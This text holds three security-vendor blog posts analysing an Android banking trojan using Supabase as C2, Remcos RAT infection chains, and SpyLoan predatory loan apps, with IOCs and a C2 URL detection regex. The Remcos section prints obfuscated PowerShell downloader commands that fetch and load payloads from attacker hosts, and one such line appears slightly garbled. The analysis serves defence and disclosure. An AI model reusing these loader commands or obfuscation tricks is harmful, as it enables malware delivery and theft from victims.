In previous reports, we’ve introduced various C2 servers used by malware. However, this malware stands out due to its unique use of Supabase, an open-source database service. Supabase is an open-source backend-as-a-service, similar to Firebase, that provides PostgreSQL-based database, authentication, real-time features, and storage. It helps developers quickly build applications without managing backend infrastructure. Also, it supports RESTful APIs to manage their database. This malware exploits these APIs to store stolen data.

Figure 6. App code using Supabase

 

A JWT (JSON Web Token) is required to utilize Supabase through its RESTful APIs. Interestingly, the JWT token is exposed in plain text within the malware’s code. This provided us with a unique opportunity to further investigate the extent of the data breach. By leveraging this token, we were able to access the Supabase instance used by the malware and gain valuable insights into the scale and nature of the data exfiltration.

Figure 7. JWT token exposed in plaintext

 

During our investigation, we discovered a total of 5,558 records stored in the database. The first of these records was dated October 9, 2024. As previously mentioned, these records include 4,918 SMS messages and 623 entries of card information (number, expiration date, CVV) and bank information (account numbers, login credentials like ID and password).

Figure 8. Examples of stolen data

 

Uncovering variants by package prefix

The initial sample we found had the package name “gs_5.customer”. Through investigation of their database, we identified 8 unique package prefixes. These prefixes provide critical clues about the potential scam themes associated with each package. By examining the package names, we can infer specific characteristics and likely focus areas of the various scam operations.

Package Name	Scam Thema
ax_17.customer	Axis Bank
gs_5.customer	Gas Bills
elect_5.customer	Electrical Bills
icici_47.customer	ICICI Bank
jk_2.customer	J&K Bank
kt_3.customer	Karnataka Bank
pnb_5.customer	Punjab National Bank
ur_18.customer	Uttar Pradesh Co-Operative Bank

Based on the package names, it seems that once a scam theme is selected, at least 2 different variants are developed within that theme. This variability not only complicates detection efforts but also increases the potential reach and impact of their scam campaigns.

Mobile app management of C2

Based on the information uncovered so far, we found that the malware actor has developed and is actively using an app to manage the C2 infrastructure directly from a device. This app can send commands to forward SMS messages from the victim’s active phones to specified numbers. This capability differentiates it from previous malware, which typically manages C2 servers via web interfaces. The app stores various configuration settings through Firebase. Notably, it utilizes Firebase “Realtime Database” rather than Firestore, likely due to its simplicity for basic data retrieval and storage.

Figure 9. C2 management mobile application

 

Conclusion

Based on our research, we have confirmed that 419 unique devices have already been infected. However, considering the continual development and distribution of new variants, we anticipate that this number will steadily increase. This trend underscores the persistent and evolving nature of this threat, emphasizing the need for careful observation and flexible security strategies.

As mentioned at the beginning of the report, many scams originate from messaging platforms like WhatsApp. Therefore, it’s crucial to remain cautious when receiving messages from unknown or uncertain sources. Additionally, given the clear emergence of various variants, we recommend using security software that can quickly respond to new threats. Furthermore, by employing McAfee Mobile Security, you can bolster your defense against such sophisticated threats.

Indicators of Compromise (IOCs)

 

APKs:

SHA256	Package Name	App Name
b7209653e226c798ca29343912cf21f22b7deea4876a8cadb88803541988e941	gs_5.customer	Gas Bill Update
7cf38f25c22d08b863e97fd1126b7af1ef0fcc4ca5f46c2384610267c5e61e99	ax_17.customer	Client Application
745f32ef020ab34fdab70dfb27d8a975b03e030f951a9f57690200ce134922b8	ax_17.number	Controller Application

Domains:

• https[://]luyagyrvyytczgjxwhuv.supabase.co

Firebase:

• https[://]call-forwarder-1-default-rtdb.firebaseio.com

The post A New Android Banking Trojan Masquerades as Utility and Banking Apps in India appeared first on McAfee Blog.

The Stealthy Stalker: Remcos RAT

Authored By Sakshi Jaiswal, Anuradha M

In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in the world of cybersecurity, gaining traction with its ability to infiltrate systems and compromise sensitive data. This malware, often delivered through phishing emails and malicious attachments, allows cybercriminals to remotely control infected machines, making it a powerful tool for espionage, data theft, and system manipulation. As cyberattacks become more sophisticated, understanding the mechanisms behind RemcosRAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two RemcosRAT variants

The heat map below illustrates the prevalence of Remcos in the field in Q3,2024

 

Variant 1:

In the first variant of Remcos, executing a VBS file triggers a highly obfuscated PowerShell script that downloads multiple files from a command-and-control (C2) server. These files are then executed, ultimately leading to their injection into RegAsm.exe, a legitimate Microsoft .NET executable.

Infection Chain

Analysis:

Executing the VBS file initially triggers a Long-Obfuscated PowerShell command.

 

It uses multi-layer obfuscation, and after de-obfuscation, below is the final readable content.

 

The de-obfuscated PowerShell script performs the following actions:

1. Firstly, the script checks if the PowerShell version is 2.0. then the file will be downloaded from Googledrive “’https://drive.google.com/uc?export=download&id=‘“ in Temp location. and if PowerShell version is not 2.0 then it downloads string from ftp server.
2. It creates a copy of itself in the startup location – \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

 

3. In this case, since the PowerShell version is not 2.0, it will download strings from the FTP server.
4. Uses FTP to download DLL01.txt file, from “ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt” with the username:desckvbrat1 and password: *******************as mentioned in the PowerShell script. Using FileZilla with the provided username and password to download files.

 

5. It has 3 files DLL01.txt, Entry.txt and Rumpe.txt, which contains a URL that provides direct access to a snippet hosted on the PasteCode.io platform.

DLL01.txt File

 

Rumpe.txt String

Figure 11: Snippet which is hosted on PasteCode.io of Rumpe.txt

 

The snippet above is encoded, Decoding it generates ClassLibrary1.dll file.

Entry.txt

 

 

1. Last line of long PowerShell script – [System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType(‘ClassLibrary3.Class1’).GetMethod( ‘prFVI’ ).Invoke( $null , [object[]] ( ‘txt.sz/moc.gnitekrame-uotenok//:sptth‘ , $hzwje , ‘true’ ) ); This line loads a .NET assembly into the current application domain and invokes it.
2. “txt.sz/moc.gnitekrame-uotenok//:sptth” The string is a reversed URL. When reversed, it becomes: https://koneotemarket.com/zst.txt. The raw data hosted in that location is base64 encoded and stored in reversed order. Once decoded and reversed, the content is invoked for execution.

 

1. After invocation, it creates a directory in AppData/Local/Microsoft, specifically within the LocalLow folder. It then creates another folder named “System Update” and places three files inside it.

The LocalLow folder is a directory in Windows used to store application data that requires low user permissions. It is located within the AppData folder. The two paths below show how the malware is using a very similar path to this legitimate windows path.

legitimate Path: C:\Users\<YourUsername>\AppData\LocalLow

Mislead Path: C:\Users\<YourUsername>\AppData\Local\Microsoft\LocalLow

In this case, a LocalLow folder has been created inside the Microsoft directory to mislead users into believing it is a legitimate path for LocalLow.

A screenshot of the files dropped into the System Update folder within the misleading LocalLow directory highlights the tactic used to mimic legitimate Windows directories, intending to evade user suspicion.

 

Content of x3.txt

 

Then x2.ps1 is executed. Content of x2.ps1

 

The command adds a new registry entry in the Run key of the Windows Registry under HKCU (HKEY_CURRENT_USER). This entry ensures that a PowerShell script (yrnwr.ps1) located in the System Update folder inside the misleading LocalLow directory is executed at every user login.

 

After adding registry entry, it executes yrnwr.ps1 file. Content of yrnwr.ps1 which is obfuscated.

 

After Decoding yrnwr.ps1

 

 

 

It utilizes a process injection technique to inject the final Remcos payload into the memory of RegAsm.exe, a legitimate Microsoft .NET executable.

 

Memory String of RegAsm.exe which shows the traces of Remcos

 

 

 

Mutex Created

 

A log file is stored in the %ProgramData% directory, where a folder named “1210” is created. Inside this folder, a file called logs.dat is generated to capture and store all system logging activities.

 

 

Finally, it deletes the original VBS sample from the system.

Variant 2 – Remcos from Office Open XML Document:

This variant of Remcos comes from Office Open XML Document. The docx file comes from a spam email as an attachment.

Infection Chain:

Email Spam:

 

The email displayed in the above image contains an attachment in the form of a .docx file, which is an Office Open XML document.

Analysis:

From the static analysis of .docx file, it is found that the malicious content was present in the relationship file “setting.xml.rels”. Below is the content of settings.xml.rels file:

 

From the above content,it is evident that it downloads a file from an external resource which points to a URL hxxps://dealc.me/NLizza.

The downloaded file is an RTF document named “seethenewthingswhichgivenmebackwithentirethingstobegetbackonlinewithentirethingsbackwithentirethinsgwhichgivenmenewthingsback_______greatthingstobe.doc”which has an unusually long filename.

The RTF file is crafted to include CVE-2017-11882 Equation Editor vulnerability which is a remote code execution vulnerability that allows an attacker to execute arbitrary code on a victim’s machine by embedding malicious objects in documents.

Upon execution, the RTF file downloads a VBS script from the URL “hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF” to the %appdata% directory, saving it as “picturewithmegetbacktouse.vbs”.

Below is the content of VBS file:

 

 

The VBScript is highly obfuscated, employing multiple layers of string concatenation to construct a command. It then executes that command using WScript.Shell.3ad868c612a6

Below is the de-obfuscated code:

 

 

The above code shows that the VBS file launches PowerShell using Base64 encoded strings as the command.

Below is the 1st PowerShell command line:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -command $Codigo = ‘LiAoIChbc3RyaW5HXSR2ZXJCT1NFUFJFZmVSRU5jRSlbMSwzXSsneCctam9JTicnKSgoKCd7MH11cmwgJysnPSB7Mn1odHRwczovLycrJ3JhJysndy4nKydnaScrJ3QnKydodScrJ2J1Jysnc2VyJysnY29uJysndGVuJysndCcrJy5jb20vTm8nKydEJysnZScrJ3QnKydlYycrJ3RPbi9Ob0RldCcrJ2VjdCcrJ09uL3JlZicrJ3MnKycvJysnaGVhZHMvbWFpbi9EZXRhaCcrJ05vJysndCcrJ2gnKyctVicrJy50eHR7MicrJ307JysnIHswfWJhJysnc2UnKyc2JysnNEMnKydvbnQnKydlJysnbicrJ3QgPSAnKycoTmV3JysnLU9iaicrJ2UnKydjJysndCBTeXMnKyd0ZW0uTmUnKyd0LicrJ1dlYicrJ0MnKydsaWVudCkuRCcrJ28nKyd3bmwnKydvYScrJ2RTdHInKydpbicrJ2coJysneycrJzB9dScrJ3JsKTsgeycrJzAnKyd9JysnYmluYXJ5QycrJ29udGUnKyduJysndCA9JysnICcrJ1tTJysneXN0JysnZW0uQ28nKydudmUnKydydCcrJ10nKyc6OkYnKydyb21CYXNlNjRTdHJpbicrJ2coezB9YmFzZScrJzYnKyc0QycrJ29udGUnKydudCcrJyknKyc7IHsnKycwfScrJ2FzcycrJ2UnKydtYmx5JysnID0nKycgWycrJ1JlZmxlY3QnKydpb24uQXNzZW1ibCcrJ3ldJysnOjpMJysnbycrJ2FkKHswfWJpbicrJ2FyeUMnKydvbicrJ3QnKydlbnQpOyBbZG5saScrJ2IuSU8uSG9tJysnZScrJ106OlZBSSh7JysnMX0nKyd0JysneCcrJ3QuJysnQ1ZGR0dSLzA3Lzc3JysnMS42OS4nKyc0MycrJzEuMScrJzkvLycrJzpwJysndHRoezEnKyd9LCB7JysnMScrJ30nKydkZXNhdGl2YWRvezEnKyd9LCB7MX1kZXMnKydhdGknKyd2YWQnKydvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWRvezF9LCcrJyB7MScrJ31SZScrJ2dBJysncycrJ217JysnMX0sJysnIHsnKycxfXsnKycxfSwnKyd7MX17MX0pJyktZiAgW2NIYVJdMzYsW2NIYVJdMzQsW2NIYVJdMzkpICk=’;$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Base64 decoded content:

 

The above base64 decoded content is used as input to the 2nd PowerShell command.

Below is the 2nd PowerShell command line:

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -windowstyle hidden -executionpolicy bypass -NoProfile -command “. ( ([strinG]$verBOSEPREfeRENcE)[1,3]+’x’-joIN”)(((‘{0}url ‘+’= {2}https://’+’ra’+’w.’+’gi’+’t’+’hu’+’bu’+’ser’+’con’+’ten’+’t’+’.com/No’+’D’+’e’+’t’+’ec’+’tOn/NoDet’+’ect’+’On/ref’+’s’+’/’+’heads/main/Detah’+’No’+’t’+’h’+’-V’+’.txt{2’+’};’+’ {0}ba’+’se’+’6’+’4C’+’ont’+’e’+’n’+’t = ‘+'(New’+’-Obj’+’e’+’c’+’t Sys’+’tem.Ne‘+’t.’+’Web’+’C’+’lient).D’+’o’+’wnl’+’oa’+’dStr’+’in’+’g(‘+'{‘+’0}u’+’rl); {‘+’0’+’}’+’binaryC’+’onte’+’n’+’t =’+’ ‘+'[S’+’yst’+’2024 – New ‘+’nve’+’rt’+’]’+’::F’+’romBase64Strin’+’g({0}base’+’6’+’4C’+’onte’+’nt’+’)’+’; {‘+’0}’+’ass’+’e’+’mbly’+’ =’+’ [‘+’Reflect’+’ion.Assembl’+’y]’+’::L’+’o’+’ad({0}bin’+’aryC’+’on’+’t’+’ent); [dnli’+’b.IO.Hom’+’e’+’]::VAI({‘+’1}’+’t’+’x’+’t.’+’CVFGGR/07/77’+’1.69.’+’43’+’1.1’+’9//’+’:p’+’tth{1’+’}, {‘+’1’+’}’+’desativado{1’+’}, {1}des’+’ati’+’vad’+’o{1}, {1}des’+’at’+’i’+’vado{1},’+’ {1’+’}Re’+’gA’+’s’+’m{‘+’1},’+’ {‘+’1}{‘+’1},’+'{1}{1})’)-f [cHaR]36,[cHaR]34,[cHaR]39) )”

• The PowerShell script uses string obfuscation by combining parts of strings using join and concatenation. This hides the actual URL being fetched.
• It constructs a URL that points to a raw GitHub file: hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Below is the content of “DetahNoth-V.txt”:

 

Below is the code snippet to decode the above Base64 string into binary format and load it into memory as a .NET assembly. This method avoids writing files to disk, which makes it harder for some security products to detect the operation.

 

The decoded binary content leads to a DLL file named as “dnlib.dll”.

Below is the last part of code in the 2nd PowerShell command line:

 

Once the assembly “dnlib.dll” is loaded, it calls a method VAI from a type dnlib.IO.Home within the loaded assembly. This method is invoked with several arguments:

• txt.CVFGGR/07/771.69.431.19//:ptth: This is a reversed URL (hxxp://91.134.96.177/70/RGGFVC.txt) that might point to another resource.
• desativado (translated from Portuguese as “deactivated”): Passed multiple times as arguments. This is used as a parameter for deactivating certain functions.
• RegAsm: This is the name of the .NET assembly registration tool, potentially indicating that the script is registering or working with assemblies on the machine.

Below is the content of URL -hxxp://91.134.96.177/70/RGGFVC.txt:

 

The content shown above is a reversed, Base64-encoded binary payload, which, when decoded, results in the Remcos EXE payload.

Indicators of Compromise (IOCs)

Variant 1

File Type	SHA256
Vbs	d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2

Variant 2

File Type	SHA256
Eml	085ac8fa89b6a5ac1ce385c28d8311c6d58dd8545c3b160d797e3ad868c612a6
Docx	69ff7b755574add8b8bb3532b98b193382a5b7cbf2bf219b276cb0b51378c74f
Rtf	c86ada471253895e32a771e3954f40d1e98c5fbee4ce702fc1a81e795063170a
Vbs	c09e37db3fccb31fc2f94e93fa3fe8d5d9947dbe330b0578ae357e88e042e9e5
dnlib.dll	12ec76ef2298ac0d535cdb8b61a024446807da02c90c0eebcde86b3f9a04445a
Remcos EXE	997371c951144335618b3c5f4608afebf7688a58b6a95cdc71f237f2a7cc56a2

URLs

hxxps://dealc.me/NLizza

hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF

hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

hxxp://91.134.96.177/70/RGGFVC.txt

Detections:

Variant 1

FileType	Detection
VBS	Trojan:Script/Remcos.JD

Variant 2

FileType	Detection
Docx	Trojan:Office/CVE20170199.D
RTF	Trojan:Office/CVE201711882.A
VBS	Trojan: Script/Remcos.AM
Powershell	Trojan: Script/Remcos.PS1
EXE	Trojan:Win/Genericy.AGP

Conclusion

In conclusion, the rise of Remcos RAT highlights the evolving nature of cyber threats and the increasing sophistication of malware. As this remote access Trojan continues to target consumers through phishing emails and malicious attachments, the need for proactive cybersecurity measures has never been more critical. By understanding the tactics used by cybercriminals behind Remcos RAT and implementing robust defenses such as regular software updates, email filtering, and network monitoring, organizations can better protect their systems and sensitive data. Staying vigilant and informed about emerging threats like Remcos RAT is essential in safeguarding against future cyberattacks.

References

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/

 

 

 

The post The Stealthy Stalker: Remcos RAT appeared first on McAfee Blog.

SpyLoan: A Global Threat Exploiting Social Engineering

Authored by: Fernando Ruiz

The McAfee mobile research team recently identified a significant global increase of SpyLoan, also known as predatory loan apps, on Android. These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions,  which can lead to extortion, harassment, and financial loss. 

During our investigation of this threat, we identified fifteen apps with a combined total of over eight million installations.  This group of loan apps share a common framework to encrypt and exfiltrate data from a victim’s device to a command and control (C2) server using a similar HTTP endpoint infrastructure. They operate localized in targeted territories, mainly in South America, Southern Asia, and Africa, with some of them being promoted through deceptive advertising on social media.  

McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the apps discovered to Google who have notified the developers that their apps violate Google Play policies and fixes are needed to come into compliance. Some apps were suspended from Google Play while others were updated by the developers. 

McAfee Mobile Security detects all of these apps as Android/PUP.SpyLoan due to our PUP policy since even after some apps have updated to reduce the permissions requirements and the harvesting of sensitive information they still pose a risk for the user’s privacy due to the potential unethical practices that can be conducted by the operators of these apps that are not licensed or registered with the authorities that regulate financial services in each jurisdiction where they operate. 

 

Since 2020, SpyLoan has become a consistent presence   in the mobile threat landscape. However, our telemetry indicates a rapid surge in their activity recently. From the end of Q2 to the end of Q3 2024, the number of malicious SpyLoan apps and unique infected devices has increased by over 75%.   

Understanding the Threat

What Are SpyLoan Apps?

SpyLoan apps are intrusive financial applications that lure users with promises of quick and flexible loans, often featuring low rates and minimal requirements. While these apps may seem to offer genuine value, the reality is that these apps primarily exist to collect as much personal information as possible, which they then may exploit to harass and extort users into paying predatory interest rates. They employ questionable tactics, such as deceptive marketing that highlights time-limited offers and countdowns, creating a false sense of urgency to pressure users into making hasty decisions. Ultimately, rather than providing genuine financial assistance, these apps can lead users into a cycle of debt and privacy violations. 

While the specific behavior may vary by country, these apps share common characteristics and code at app and infrastructure level: 

• Distribution via Official App Stores: Despite violating policies, these apps often slip through app store vetting processes and are available on platforms like Google Play, making them appear trustworthy. 
• Deceptive Marketing: They use names, logos, and user interfaces that mimic reputable financial institutions to gain credibility. Often these loan apps are promoted by ads on social media networks 

“High amount of loan” Add on Facebook for app “Presta Facil: Revision Rapida” which translate to “Easy Loan: Fast Approval” detailing interest rates, amount, period, etc for a loan in Colombian pesos. 

• Similar user flow: After first execution a privacy policy is displayed with the details of what information will be collected, then a countdown timer creates the sense of urgency to apply to the loan offer and the user’s phone number with the country code of the targeted territory is required to continue, asking for a one-time-password (OTP) that is received by SMS to authenticate the user and validate that user has a phone number from the targeted country. 

SpyLoan apps are consistent with this onboarding process. Then navigation bar and app actions are very similar with different graphics but have the same features in their respective localized languages. 

Both apps have in common a framework that shares the user interface, user’s flow and encryption libraries with techniques for communication with C2 infrastructure, while the operators have different locations, language and target countries.

• Privacy agreements: These apps have similar but not equal privacy terms, in general they describe and justify the sensitive data to be collected as part of the user identification process and anti-fraud measures.
  • They require users to consent to collect excessive and exploitative data that a formal financial institution would not normally require, such as SMS message content, call logs and contact lists.
  • The contact information of the financial institution is from free service email domain like Gmail or Outlook, like a personal email address, not from a formal and legal financial institution.
  • The websites implementation of the privacy terms of these SpyLoans apps are built with the same web-framework, using JavaScript to dynamically load the content of the terms, this text is not available in the HTML files directly.

• Excessive Permission Requests: Upon installation, they request permissions that are unnecessary for a loan app, such as access to contacts, SMS, storage, calendar, phone call records and even microphone or camera.

Common permissions on SpyLoan applications can be:

• • permission.CAMERA
  • permission.READ_CALL_LOG
  • permission.READ_PHONE_STATE
  • permission.ACCESS_COARSE_LOCATION
  • permission.READ_SMS

Depending on the implementation and distribution method they can include more sensitive permissions.

• Enticing Offers: Promising quick loans with minimal requirements to attract users in urgent financial situations. A countdown might be displayed to increase the sense of urgency.

Phone Validation via SMS OTP: To complete the registration a phone number with the country code of the target country is required to validate the user’s phone is on the territory, receiving an one time password (OTP) to proceed to the registration via text message.

Data Collection: Users are prompted to provide sensitive legal identification documents and personal information, banking accounts, employee information among with device data that is exfiltrated from the victim’s device.

Impact on Users

Financial Exploitation

• Hidden Fees and High Interest Rates: Users receive less than the promised loan amount but are required to repay the full amount plus exorbitant fees within a short period.
• Unauthorized Charges: Some apps initiate unauthorized transactions or charge hidden fees.

Privacy Violations

• Data Misuse: Personal information is exploited for blackmail or sold to third parties. This might include sextortion with victims’ pictures that can be exfiltrated or created with AI.
• Harassment and Extortion: Users and their contacts receive threatening messages or calls including death threats.

Emotional and Psychological Distress

• Stress and Anxiety: Aggressive tactics cause significant emotional harm.
• Reputational Damage: Public shaming can affect personal and professional relationships.

Back to 2023 in Chile media reported the suicide of a victim of fake loans after the harassment and threats to her friends and family and to her integrity.

Data Exfiltration analysis

The group of SpyLoan applications reported in this blog belongs to the family identified by McAfee as Android/SpyLoan.DE that transmits the collected information encrypted to the command and control (C2) using AES (Advanced encryption standard) with 128bits keys then base64 encoding and optionally adds a hardcoded padding over https.

Encryption key and initialization vector (IV) are hardcoded into the obfuscated application code.

SpyLoan uses this same encryption routine to hide sensitive strings on resources.xml that leads to data exfiltration, for example:

• String skadnjskdf in resources.xml:
  • <string name=”skadnjskdf”>501tm8gR24S8F8BpRDkvnw==</string>
• The AES decrypted value using the same encryption routine implemented for data exfiltration:
  • <string name=”skadnjskdf”>content://sms/</string>

This string is used to construct a content URI that allows access to SMS Messages that it’s implemented to extract fields like, date, address (sender/recipient), message body, status, etc., and formats into JSON that then will be encrypted again to be sent to the C2.

Figure 6: Code section that exfiltrates all SMS messages from Victim’s device

Exfiltrated data is posted into the C2 via HTTP post inside an encrypted JSON object. The URLs of the endpoints used to collect sensitive data shares the URL structure between different SpyLoan applications. They use the same URLs scheme that can be detected by this regex:

^https:\/\/[a-z0-9.-]+\/[a-z]{2,}-gp\/[a-z0-9]+\/[a-z0-9]+$

Some examples of C2 URLs that match this scheme:

• hxxps://su.mykreditandfear.com/her-gp/kgycinc/wjt
• hxxps://hx.nihxdzzs.com/dz-gp/cfmwzu/uyeo
• hxxps://prep.preprestamoshol.com/seg-gp/pdorj/tisqwfnkr
• hxxps://tlon.pegetloanability.com/anerf-gp/jwnmk/dgehtkzh

Using the same technique and obfuscation methods SpyLoan samples hide in his code the ability to exfiltrate larges amount of sensitive data from their victims, including:

• Call Logs: Collects call log data from the device if permissions are granted
  • Number: The phone number of the caller
  • Type: Type of call (incoming, outgoing, missed)
  • Duration: The duration of the call
  • Date: The timestamp of the call
  • Name: The name of the contact (if available)
• Files in download directory with metadata: file name, extension, file size, last modified timestamp
• All accounts on the device, emails and social media accounts.
• Information about all apps installed

Other miscellaneous information collected:

• Device and Network information:
  • Subscriber ID
  • DNS Information
  • Device ID (IMEI)
  • MAC address
  • Country code
  • Network Operator Name
  • Language
  • Network Type (WIfi, 4G, 3G, etc)
  • Phone number
  • Locale information (country code, display language)
  • Time Zone
  • Development Settings (enable or disable)
  • Phone Type (GSM, CDMA)
  • Elapsed Real-Time (The elapsed time since device was booted)
  • Proxy Configuration
• SIM Information
  • SIM country ISO Code
  • SIM Serial Number (ICCID)
• Location:
  • Permission: It checks for ACCESS_COARSER_LOCATION
  • Location provider: Check if GPS or network location are available
  • Last known location: Latitude or longitude
  • Geocoding information (converts latitude and longitude into a structured address):
    • Country name
    • Admirative area
    • City
    • Street
    • Address Line
  • Device configuration
    • Number of images: It counts the number of images files in external storage
    • Test Mode: reports if the device is in test mode
    • Keyboard Configuration
    • Current time
    • Enabled accessibility services flag
  • OS Settings:
    • Android version details (version, sdk level, fingerprint, id, display build)
    • Hardware information (device name, product name, device model, hardware details, device brand, board info, device serial number)
    • System configuration (bootloader version, build host, build user, CPU info)
    • Network (radio version, system type, build tags)
  • Storage Information:
    • External storage path, size,
    • Internal storage: total size, available size.
    • Memory information: total RAM, available RAM
  • Sensor data

Data from sensors such as accelerometers, gyroscopes, magnetometers if available on the affected device. This information includes:

• Sensor type, sensor name, version, vendor, maximum range, minimum delay, power consumption, resolution.

Sensor data can be used for device fingerprinting and user’s behavioral monitoring.

• Battery Information:
  • Battery level
  • Battery status: Indicates if the devices is plugged
  • Other battery metadata: health, if present, voltage, battery technology, type, etc.
• Audio settings (maximum and current volume levels)

Victim Experiences

Users have reported alarming experiences, such as:

• Receiving threatening calls and death threats for delayed payments.
• Having personal photos and IDs misused to intimidate them.
• The app accesses their contacts to send harassing messages to friends and family.

Typical comments on fake loan apps:

For example, “Préstamo Seguro-Rápido, Seguro” had many fake positive reviews on Google Play while a few consistent users reviews that alleged abuse of the collected data, extorsion and harassment.

 

 

October 18, 2024 I do not recommend this app. They start calling and threatening you with edited photos and posting them on social media, even sending them to your contacts, a day before. Even when it’s not the due date. Not recommended at all! Pure fraud and extortion.

September 25, 2024 Horrible app, they don’t show you how much interest they will charge, which is a lot, and before the payment date arrives, they start threatening your contacts and even send you personal messages with threats and foul language, threatening to extort your family.

Meanwhile other apps receive similar negative comments:

Global Impact of SpyLoans Apps

Worldwide Issue with Local Variations

These threats are not confined to a single region; they’ve been reported globally with localized adaptations. Predatory loan apps activities have been identified worldwide not limited to the variants technically described in this post, the following incidents can provide a wider context of the impact of this threat:

• Asia:
  • India: Users faced harassment and data leaks from apps misusing granted permissions. Authorities have taken action against such apps
  • Southeast Asia: Countries like Thailand, Indonesia, Vietnam and Philippines have reported significant issues with these apps exploiting users’ financial vulnerabilities.
    • Bank of Thailand advise center
  • Africa:
    • Nigeria, Kenya, Uganda: Similar apps have led to financial fraud and unauthorized transactions, targeting a large unbanked population.
  • Latin America:
    • Mexico, Colombia, Chile and Peru: Users have reported threats and harassment, with apps misusing personal data for extortion.

Ranking of top 10 countries with highest prevalence of Fake Loans apps according to McAfee telemetry Q3 2024:

• India
• Mexico
• Philippines
• Indonesia
• Thailand
• Kenya
• Colombia
• Vietnam
• Chile
• Nigeria

Law Enforcement Actions

According to a report by the Judiciary of Peru, authorities conducted a major raid on a call center engaged in extortion and the operation of fake loan apps targeting individuals in Peru, Mexico, and Chile. 

The police reported that over 300 individuals were linked to this criminal operation, which had defrauded at least 7,000 victims across multiple countries. 

The call center employees were trained specifically to extort victims. Using information collected from the SpyLoan apps, they threatened users to extract as much money as possible by imposing inflated interest rates and additional fees. 

Meanwhile in Chile, the commission for commission for the financial market (CMF) highlights in their website tens of fraudulent credit applications that has been distributed on Google Play, also the national consumer service (SERNAC) reports more cases. 

In May 2024, the Chilean police has detained over 25 people linked to one Fake Loans operations that scammed over 2,000 victims according to La Tercera. 

Despite the efforts the activity of these malware applications continues and increases in South America and the rest of the world. 

Conclusion

The threat of Android apps like SpyLoan is a global issue that exploits users’ trust and financial desperation. These apps leverage social engineering to bypass technical security measures and inflict significant harm on individuals. Despite law enforcement actions to capture multiple groups linked to the operation of SpyLoan apps, new operators and cybercriminals continue to exploit these fraud activities, especially in South America, Southeast Asia and Africa.

SpyLoan apps operate with similar code at app and C2 level across different continents this suggest the presence of a common developer or a shared framework that is being sold to cybercriminals. This modular approach allows these developers to quickly distribute malicious apps tailored to various markets, exploiting local vulnerabilities while maintaining a consistent model for scamming users.

By reusing code and tactics, they can efficiently target different countries, often evading detection by authorities and creating a widespread problem that is difficult to combat. This networked approach not only increases the scale of the threat but also complicates efforts to trace and shut down these operations, as they can easily adapt and relocate their operations to new regions.

By understanding how these malicious apps operate and taking proactive steps to protect ourselves, we can mitigate the risks and help others do the same.

How To Protect Yourself: Tips and Recommendations

Be Cautious with Permissions

• Review Permissions Carefully: Be wary of apps requesting permissions that seem unnecessary for their function.
• Limit Permissions: Deny permissions that are not essential.

Verify App Legitimacy

• License and Registration: Ensure the institution is registered and licensed to operate in your country. Verify with your financial regulator’s authority or consumer protection agency.
• Read User Reviews: Look for patterns of complaints about fraud or data misuse, pay special attention in apps with polarized reviews that might contain fake positive reviews.
• Research the Developer: Look up the developer’s name, website, and reviews. Even if the app contains privacy policy which is mandatory on Google Play this might not be honored by scammers.

Use Security Measures

• Install Security Software: Use reputable antivirus and anti-malware apps.
• Keep Your Device Updated: Regular updates can protect against vulnerabilities.

Practice Safe Online Behavior

• Don’t Share Sensitive Information: Provide personal data only to trusted and verified entities.
• Be Skeptical of Unrealistic Offers: If it sounds too good to be true, it probably is.

Report Suspicious Activity

• Notify App Stores: Report fraudulent apps to help protect others.
• Contact Authorities: If you’re a victim, report the incident to local law enforcement or cybercrime units.

IOC

Package	App Name	Downloads	Country	SHA256
com.prestamoseguro.ss	Préstamo Seguro-Rápido, seguro	1M	Mexico	f71dc766744573efb37f04851229eb47fc89aa7ae9124c77b94f1aa1ccc53b6c
com.voscp.rapido	Préstamo Rápido-Credit Easy	1M	Colombia	22f4650621fea7a4deab4742626139d2e6840a9956285691b2942b69fef0ab22
com.uang.belanja	ได้บาทง่ายๆ-สินเชื่อด่วน	1M	Senegal	b5209ae7fe60abd6d86477d1f661bfba306d9b9cbd26cfef8c50b81bc8c27451
com.rupiahkilat.best	RupiahKilat-Dana cair	1M	Senegal	9d51a5c0f9abea8e9777e9d8615bcab2f9794b60bf233e3087615638ceaa140e
com.gotoloan.cash	ยืมอย่างมีความสุข – เงินกู้	1M	Thailand	852a1ae6193899f495d047904f4bdb56cc48836db4d57056b02352ae0a63be12
com.hm.happy.money	เงินมีความสุข – สินเชื่อด่วน	1M	Thailand	43977fce320b39a02dc4e323243ea1b3bc532627b5bc8e15906aaff5e94815ee
com.kreditku.kuindo	KreditKu-Uang Online	500K	Indonesia	dfbf0bf821fa586d4e58035ed8768d2b0f1226a3b544e5f9190746b6108de625
com.winner.rupiahcl	Dana Kilat-Pinjaman kecil	500K	Indonesia	b67e970d9df925439a6687d5cd6c80b9e5bdaa5204de14a831021e679f6fbdf1
com.vay.cashloan.cash	Cash Loan-Vay tiền	100K	Vietnam	e303fdfc7fd02572e387b8b992be2fed57194c7af5c977dfb53167a1b6e2f01b
com.restrict.bright.cowboy	RapidFinance	100K	Tanzania	e59fd9d96b3a446a2755e1dfc5a82ef07a3965866a7a1cb2cc1a2ffb288d110c
